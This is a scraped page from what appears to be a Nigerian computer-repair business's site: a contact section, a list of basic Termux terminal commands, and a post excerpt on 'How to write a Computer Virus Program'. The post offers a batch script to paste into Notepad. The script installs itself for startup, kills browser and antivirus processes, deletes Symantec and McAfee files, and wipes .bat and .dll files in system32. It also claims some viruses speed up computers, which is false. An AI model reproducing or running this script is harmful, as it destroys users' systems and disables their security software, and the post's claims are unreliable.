COVID-19 IS REAL PLEASE STAY AT HOME, FOR ADVERT PLACEMENT OR INQUIRY PLEASE CALL: 08166201592 OR 09031936614 THANKS Contact Us Skip to main content

Contact Us

Computercons Technology would gladly like to speak with you concerning your personal or corporate computer, network and Voice Over IP systems. we provide services from repair to installation to pre-sales consulting service. We also provide remote desktop support nationally.

Telephone

office (+234) 8166201592
          (+234) 9031936614

Mailing Address

henrycocomputers@gmail.com
henrycocomputerconsultant@gmail.com

Head Office:

Computercons Technology beside Holy Redeemer Catholic Mass Center Edegelem Igbo-Etche Rivers State Nigeria

Hours of Operation

We are available 6 Days a week and set all appointments in advance.





Popular posts from this blog

Basic Turmux Commands

Turmux is an android terminal emulator that enables command line interface, just like command prompt , it  works directly with no rooting or setup required Basic Command Codes and Their Functions cp -v This is used to prints informative massage cp -r This is used to copy any directory mv -u This is used to update-move when source is newer than destination mv -v This is used to move any directory ls -n This is used to display UID and GID directory ls --version This is used to check the version of ls command cd -- This is used to show last working directory from where we moved ls -l This is used to show file action like - modified, date and time, owner of file, permissions Etc. ls help This is used to show display how to use "ls" command cp -n no file overwrite cd ~ This is used to move to users home directory from anywhere mv [file1 name] [new file2 name] This is used to move or rename two file at a time cd - This is used to move one directory back from...

Center for Information Technology and Education Standards

How to write a Computer Virus Program

Computer Virus is simply a  program written by programmer to fight against the computer system. Sometimes some computer virus help to boost the speed of your computer.  1. How to make a virus with notepad To write your first computer virus program copy this code below and past on Note pad .   @echo off copy “virus.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” copy “virus.bat” “C:” copy “virus.bat” “%userprofile%My Documents” tskill explorer tskill ccapp tskill yahoomessenger tskill firefox tskill chrome rem made with Batch Virus Maker V.2 tskill iexplorer time 12:00 rem made with Batch Virus Maker V.2 del C:Program FilesCommon FilesSymantec Sharedccapp.exe cd C:WINDOWS if exist “*.bat” del “*.bat” cd C:WINDOWSsystem32 rem made with Batch Virus Maker V.2 if exist “*.dll” del “*.dll” tskill McAfee Security Centre Module del c:program filesmcafee.comagentmcdetect.exe rem made with Batch Virus Maker V...